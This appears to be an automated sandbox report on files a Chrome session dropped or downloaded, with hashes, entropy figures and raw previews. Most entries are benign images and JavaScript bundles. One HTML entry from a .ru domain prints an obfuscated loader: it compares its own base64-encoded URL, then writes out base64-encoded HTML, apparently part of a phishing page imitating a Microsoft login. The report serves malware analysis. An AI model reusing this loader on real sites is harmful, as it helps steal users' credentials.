                                                                                                                                                                                                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_1cd84c14a6b01fcd8515.js
                                                                                                                                                                                                                                            Preview:...........[}w.F....Bh..i3.M.t.rU.....]..M...@.(..........@..N..I-k..;w.....U.F..v....N....]....MC......U.]o>..mJ.w..~.5<......Z.h~8..8J..m......0.&Z:.Z.D_. .Z.....<.f..t..].I:..........b. ...}.ja......'..x......m6..c...$..........b|s......O.a..cE..u.2.*.6jG!.A.....P..?q@?"..).Mk.0.[."V..M..4...4.~}.?.i..D.}h|..$x.Ajm.S..H..-.x.If..]..1.D0.F......pq.(.|...y\...5....y2.q.Fq...[.|..n.b.i_D......xuR......I.TS.4..}|<...o....MG.+@.......\.?."...+[...A..&...{]......u..+p?......|...j....7...=H..cwp.38.;%c.....O..............p...X.g!....r...d..5.%x.....;...j6p...p......c.Nd.:...&.*....%.. tR.d.@.. ...1..6....i....:...s=..V...iN..1../tH..p<..Mo.......`&.7uA;..(lC.......4...?..0..[S@...D..|....=.wh2...<.. ...)..F...!. .C...k...S.pPt......s..K.V...w......7....Zn.d..t]l.........5=.(..#.....l._.Ip......-O.6.,......q4....!XS`6k..k.....9k....{~*.....X....q......l.>x..={j.n..W......e..Q..I/..;a..MS>.!5v.d.B+.o.....q...j.q..Z..=..@g.1q..,yBV91m.j>..4.o...
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1167
                                                                                                                                                                                                                                            Entropy (8bit):7.327644603639709
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:27/689luRphtvMFk3hU6MP1V8ZrBBQFBL+Qz:27/689oR53h3rZrz2BL+w
                                                                                                                                                                                                                                            MD5:E8EBDF41A41790CF73E2A2EBB6FFE690
                                                                                                                                                                                                                                            SHA1:49127A11E99193A7A3A4DA08CADCDE291F67A871
                                                                                                                                                                                                                                            SHA-256:BE1B127A8314B29D436303456CE25D28DCAA6922EDB488D5B2EA5DAD079049FE
                                                                                                                                                                                                                                            SHA-512:431DC2BC4FB339468FFEF2B1F3D98BE0868C5726DB21832B05A93AEB8C5515D46DF3EDBA5FCC3597C846BBD7727E0CE77AA5DB9E27AC6B2C69E4848928442681
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:.PNG........IHDR... ... .....szz.....pHYs.................eXIfII*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100.................... ........... .........._....IDATx...s.G...yh.,.zY.,R..s...R..q..S.rKU......HN@.K..qd.".;... .q*....A}....o.{~....9..g....`....v.:.v....Z...`..v.\...BLGkg.......?.U.>==cb...b.%...@...B.i.$!....\.8Fi.MS.4E+..v..$d..(......;#.J....I.e7?....k....e..!.Q...)R.......BP(....t.]J.2....qX^^f<....P,...8;{C...|8$.C..h..=.wi.....8.b.8...i6.(.(W+T.567.8..y.....:.B.[[.H.....?..#..v..rgw.~.G....G.a.....Z.....{.a...b.A...9.t...K.G.~..^.O..%_,.q...B..h...=..#:........).....)%Q.Q.T...4..x...l.6....R....M..V......^[{..j..>..#|.......e...}...n.Y]-....R.D..j../9...Z.(....<...l6......G..<9..\.G..a0. 6..6...o.i.^5..-RJ..!.B.$!M...".1`-B.,P*....Xo6.....G.T.q....c..r .R.. `8..]..L&(..Z_%.~..0B)...)\.1d.f2...w....$...'1/..`gg..q(W*....h....P\]..k...[..{.......
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):673
                                                                                                                                                                                                                                            Entropy (8bit):7.6596900876595075
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                                                                                                                                                                                                            MD5:0E176276362B94279A4492511BFCBD98
                                                                                                                                                                                                                                            SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                                                                                                                                                                                                            SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                                                                                                                                                                                                            SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1006)
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2813454
                                                                                                                                                                                                                                            Entropy (8bit):5.025469980667826
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:49152:7AnSxHLYqLJpYB7SXe/IOLsBCuCIhviiCIyQ2HxPTARkLNegfxvjni:zJ
                                                                                                                                                                                                                                            MD5:C46D7D8F56170A6D8F5A410C401BCCF5
                                                                                                                                                                                                                                            SHA1:E72E72E4AA55CF9492AA8B1D0CD42E796B874E56
                                                                                                                                                                                                                                            SHA-256:86B36FC48609CC2FAEEBCD83A3AF8798FBC60D2F9DDEE17D82BAFC3CA7DE3D1A
                                                                                                                                                                                                                                            SHA-512:4C0DA2BC6FB955C542BCD115CDA96B5FF9D4561F111661A69DB82D4F4451E885BA57B123530EF7868B9E4DF05C31098AA4FC5A7BEA4495382D1E961FFA754E96
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:/**. * @licstart The following is the entire license notice for the. * JavaScript code in this page. *. * Copyright 2022 Mozilla Foundation. *. * Licensed under the Apache License, Version 2.0 (the "License");. * you may not use this file except in compliance with the License.. * You may obtain a copy of the License at. *. * http://www.apache.org/licenses/LICENSE-2.0. *. * Unless required by applicable law or agreed to in writing, software. * distributed under the License is distributed on an "AS IS" BASIS,. * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.. * See the License for the specific language governing permissions and. * limitations under the License.. *. * @licend The above is the entire license notice for the. * JavaScript code in this page. */..(function webpackUniversalModuleDefinition(root, factory) {..if(typeof exports === 'object' && typeof module === 'object')...module.exports = factory();..else if(typeof define === 'function' && define.amd
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):17174
                                                                                                                                                                                                                                            Entropy (8bit):2.9129715116732746
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                                                                                            MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                                                                                            SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                                                                                            SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                                                                                            SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (7517), with CRLF line terminators
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):20095
                                                                                                                                                                                                                                            Entropy (8bit):5.890897701181668
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:pnuton5ZajOFe3RvR/8MLnuton5ZajOFe3RvR/8TlrKlrD:Hn5ZajOFe378MNn5ZajOFe378TlrKlrD
                                                                                                                                                                                                                                            MD5:C1070D64770FF0E6F0A14255C5D4A620
                                                                                                                                                                                                                                            SHA1:75827735BD2D6EBFCCD7BA7B1A46B8861FC693F7
                                                                                                                                                                                                                                            SHA-256:1D7B0A60802F270468521517A014A38608EDFA4BBE5C26C7E2E952AF1EC713F8
                                                                                                                                                                                                                                            SHA-512:157530CB54388870FCD30D13A107F49CB1008A7C37137DC79B2810D1B1D9BF86BC68D1A7DC782EFC88102FAEEF588A0F7E9B945621B51838D3C756FE15845185
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://dm9h.zomivane.ru/oIZnEw3n/
                                                                                                                                                                                                                                            Preview: Success is not built on success. It&#039;s built on failure. It&#039;s built on frustration. Sometimes it&#039;s built on catastrophe. -->.. Success is finding satisfaction in giving a little more than you take. -->..<script>....if(atob("aHR0cHM6Ly9kbTlILnpvbWl2YW5lLnJ1L29JWm5FdzNuLw==") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):621
                                                                                                                                                                                                                                            Entropy (8bit):7.673946009263606
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:Xp7fmqfW/e4YC2L0E5DZLB62y/+6lbPa1Gotq8mdd2Xmy2QLBwxD+QkCfBJ:Xp6qf2SCk3LBpy/rtPa1GKq8mOX5jLcD
                                                                                                                                                                                                                                            MD5:4761405717E938D7E7400BB15715DB1E
                                                                                                                                                                                                                                            SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                                                                                                                                                                                                            SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                                                                                                                                                                                                            SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (48786)
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):49207
                                                                                                                                                                                                                                            Entropy (8bit):5.485940577630699
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:+L+42Rhuu7AmIZZA+JYMrOhdDR/gk1pxjUSo2GXiefH0aeP89d5JV3yXmVK:Pp++MOlR/H1pxUSo2GSeLvTJ/K
                                                                                                                                                                                                                                            MD5:B57EE8A7B5BDA7F4801DF3EEAEDAA9B0
                                                                                                                                                                                                                                            SHA1:17C9FB906586C971337553606CDBDC098DE20499
                                                                                                                                                                                                                                            SHA-256:3538F9FCD63BEA1031A4AA80FEFCA5A3073EF214637A16145593E8745EA9223C
                                                                                                                                                                                                                                            SHA-512:640E0D6AFF34BBEA42D25D4317211E7A1FB255983F027BE83A79A3564A673AC4BF8EDAF984753871BD811C64AD802597DC06309D413846B4D891870CD6A15BD9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:"use strict";.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="6fbb0b50-9c59-5fa1-912c-acfdf2df6a5b")}catch(e){}}();.(("undefined"==typeof self?this:self).chunkList=("undefined"==typeof self?this:self).chunkList||[]).push([["8508"],{91918:function(e,o,t){t.d(o,{F4:function(){return O},fh:function(){return s}});var E=t(24840),r=t(60097),_=t(40991),a=t(31157),n=t(45615);const i=new E.m("/API",{interceptorConfig:{teamID:t.g.teamID,customResponseInterceptors:[r.D.requestManagerResponseNormalizer]}}),s=e=>{if((0,_.ko)())return;const o=new URLSearchParams,{lastProductAssetInteraction:t}=e;return t&&o.append("last_product_asset_interaction",t),i.post("ep/user/hubspot-contact-form",o)},O=({asset:e,target:o,action:t,intent:E})=>{if((0,n.BB)()){const r={project:a.ib.ENTERPRISE_PROMOTIONS,asset:e,target:o,action:t};E&&(r.intent=E);const
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (9110)
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):152960
                                                                                                                                                                                                                                            Entropy (8bit):5.519074782413819
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3072:koBrWCi2gPZF8FmVSoKY7GzycgOii/GZ/b:h+xo9IVcgOii/sb
                                                                                                                                                                                                                                            MD5:6EC7D849DA15C0BF56C2C65D24B78E48
                                                                                                                                                                                                                                            SHA1:48042EA450B3F24C03E7BE5D02245AD2E5077BD2
                                                                                                                                                                                                                                            SHA-256:02B45CFF82C79D1188D7506BE2FB31F4B0635C233E7B25DFD872194FA75F2CC9
                                                                                                                                                                                                                                            SHA-512:7DD3E4142CAB74DD663397DEADC0B279F4C73178571E844ED776B493538FE7A7FD567F4DECE2683E52DD6A23FA166807FF820886D31E58D5EEC6BD5C003A8D7F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:"use strict";.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="799946af-5d8f-5408-82a2-f5333ea675b7")}catch(e){}}();.(("undefined"==typeof self?this:self).chunkList=("undefined"==typeof self?this:self).chunkList||[]).push([["3619"],{4523:function(e,t,o){o.r(t),o.d(t,{default:function(){return Lr}});var n=o("94653"),i=o("37897"),r=o("11268"),a=o.n(r),s=o("27219"),l=o("31028"),c=o("66187"),p=o("22722"),d=o("45050"),m=o("27505"),u=o("95474"),g=o("65957"),h=o("38111"),x=o("55767"),f=o("47085"),v=o("38675"),b=o("32358"),w=o("30886"),y=o("11759"),C=o("54513"),I=o("81885"),k=o("19195");const j=y.ZP.div`. display: flex;. flex-direction: column;. align-items: center;. width: 100%;.. ${(0,I.c)(C.DT.AppFooter)?y.iv`. height: 100%;. margin: 0 auto;. `:y.iv`. height: fit-content;. margin: 0 auto;. margin-bottom: calc(${({isOrder
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 352 x 3
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3620
                                                                                                                                                                                                                                            Entropy (8bit):6.867828878374734
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:ZumKaT5ezv47j2/ZiRDlq16x8XvEUcg777shHdpHVGJqFd:Eal647jPDlL8XvEUcg77kVGyd
                                                                                                                                                                                                                                            MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                                                                                                                                                                                                            SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                                                                                                                                                                                                            SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                                                                                                                                                                                                            SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (19958)
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):20329
                                                                                                                                                                                                                                            Entropy (8bit):5.3624721796340715
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:19/Z2q5fanCRe8SQ/4JA3XTXrk55QsIERe+GbxfQmFzr:1auj08SQ/4i3DXrk55dTRabxIQr
                                                                                                                                                                                                                                            MD5:078680BCFD27D1B1010694DF27382A65
                                                                                                                                                                                                                                            SHA1:4CB6E6F998D877C2C5AC6F3850B906367F8536B9
                                                                                                                                                                                                                                            SHA-256:DA9F5A97CCA8958DDBF992FD4D50AA323708A2CD011DE89944D718FD0CD3D786
                                                                                                                                                                                                                                            SHA-512:366A74038BDBEC8F050BDF392D2C020325E66F6C2AABDB3E8584F099107768D9AD7B6115A656D98A785BBF0E8DC8F723824BA8145AC78804711392CA30D9F10C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:"use strict";.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="6d3191b4-0e30-546c-8b1e-a3878d876cd2")}catch(e){}}();.(("undefined"==typeof self?this:self).chunkList=("undefined"==typeof self?this:self).chunkList||[]).push([["2224"],{47456:function(n,e,t){t.d(e,{Z:function(){return h}});var i=t("94653"),a=t("37897"),r=t("11268"),u=t("41663"),c=t("12857"),o=t("98651");const l=({assetType:n,assetProps:e,campaignInfo:t,Fallback:r})=>{const l=Object.keys(t).includes("type")?[t]:[t.promotion,t.campaign,t.announcement,t.launch].filter((n=>!!n)),[y,d]=l.map((e=>{const{status:t=!0,type:i,assetsVersion:a,assetsAvailable:r=!0,assetYear:u="2024"}=e,o=(0,c.YZ)({assetInfo:{campaignType:i,assetsVersion:a,assetYear:u},assetType:n}),l=(0,c.ai)({assetType:n,assetsVersion:a,campaignType:i});return o&&r&&t&&!l?[o,e]:[]})).filter((n=>!!n.length))[
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113769
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):35170
                                                                                                                                                                                                                                            Entropy (8bit):7.993096534744333
                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                            SSDEEP:768:K+LvEzA9nny7u0zF35Hm4ngomu6yeLDKDnccqmcmHvVVPCLVf:ny7f5GpuheL4htv3Pkf
                                                                                                                                                                                                                                            MD5:171A4DD9400708B88724B57D62B24A6A
                                                                                                                                                                                                                                            SHA1:9C6F1303B8F02FCE18D20EC9CADA11D38D0C4B37
                                                                                                                                                                                                                                            SHA-256:EA00750636C11DBD4FA3ACB1B3CDCBAE3EFA43F6B6C3753444B6D6A242AE9336
                                                                                                                                                                                                                                            SHA-512:5B13B63912B34E3EEEDD8DA5953B869A83DF82FFD2A8D737AA81DC984F1811800A534F340C48041DA803C25B6B8F5605EA8D003B6A09A1874408F95A710F5126
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:...........kC.H.0......e....0.pX..Iv3..\f..0YY.m..e$.K..o...j..g.3.lpW.......[..Y.?k.Y.......8~.a..../_.;]{.............v...0..q.Dk.w...h-....Z<..l.fA..k3.7..dm....b..-...(,.$...4...f...e...AV..z.mA....O.9........k..h-.......<Z[.GQ.v3....Oq..y:..(..k.$_...._..h-...q..S.ck.=.T......Sq@.:.A.c.(....SDq..Ac.t..m.$Lc....Z...K...O<....f9..p...0Z..3.<...$YK.x.F......v....nm..s$...&..dQ4.......n-.-.......E.XD..-5~...f.....t...-_.....fsg...8kZ..|.{{....p+Lg.t9I..P./ap......o9Wx.._{....k..,...............................7.|..t...Ax.7..b..v..v.m-...~v...:....r..._........,...A........z.....|..t.. [.C.....{...~..c......ua...~.v<.I..P#._{{}._.......Km...eR....u?GY..h..}..gAv...<.l.Z...#.....:P?Q..."..........,.D...I<._.'..-..=..;.>.C_..#.....D[0.Y..*...M.....{.YT,...x..SQ/......N<`...|._.k....0)......+.Z..4...M. ...i...`.ml..-X.E.....d.. .}.e4.{6hz^..}....@....W.1...d8...>.@.....(.'[..`..A..?...yL.|..QTF...-.='S@.Q.sM.`...}.t..$..y^..0J.kC.S...U.
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (65199)
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):1618634
                                                                                                                                                                                                                                            Entropy (8bit):5.369330305473696
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:49152:fAhs5h9XcuFSJXGS+0weVXdeOgBU4MjNemACIFJjSKDjkWtmm/x2EBsPPGFPvl2M:f0seo0weXdeZIemIl7J
                                                                                                                                                                                                                                            MD5:E12C5F031D037522ABC840E972F9A822
                                                                                                                                                                                                                                            SHA1:A1BD50FC39A418ABE2E563A3F2E0F1A75448D3B1
                                                                                                                                                                                                                                            SHA-256:7314282DB782A71F3A111BA6161CEB589CADF3331E7EC4AD54BD8D83E3678C0D
                                                                                                                                                                                                                                            SHA-512:C517ACB4BEB8EC2C0AC5DF3AE0F5DFC4D42216B93A5C252401C25BB994105680C70C2CB5B7043541B5638F4D030691EFA1C7B4A60D015F9572896BB414BAE253
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://cdn01.jotfor.ms/s/portal/674ac14411e/static/js/8953.7f4b13b0.js
                                                                                                                                                                                                                                            Preview:/*! For license information please see 8953.7f4b13b0.js.LICENSE.txt */..!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="e61ab359-3f15-5dad-a80f-f88e3e676a65")}catch(e){}}();.(("undefined"==typeof self?this:self).chunkList=("undefined"==typeof self?this:self).chunkList||[]).push([["8953"],{16008:function(e,t,n){"use strict";n.d(t,{B:function(){return l},Hr:function(){return u},IG:function(){return f},S1:function(){return h},dk:function(){return m},ur:function(){return p},yV:function(){return c},y_:function(){return d}});var r,o,i=function(){return window[window._fs_namespace]},a=function(){!function(){if(!i())throw Error("FullStory is not loaded, please ensure the init function is invoked before calling FullStory API functions")}();for(var e=arguments.length,t=new Array(e),n=0;n<e;n++)t[n]=arguments[n];return t.every((function
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):17174
                                                                                                                                                                                                                                            Entropy (8bit):2.9129715116732746
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                                                                                            MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                                                                                            SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                                                                                            SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                                                                                            SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
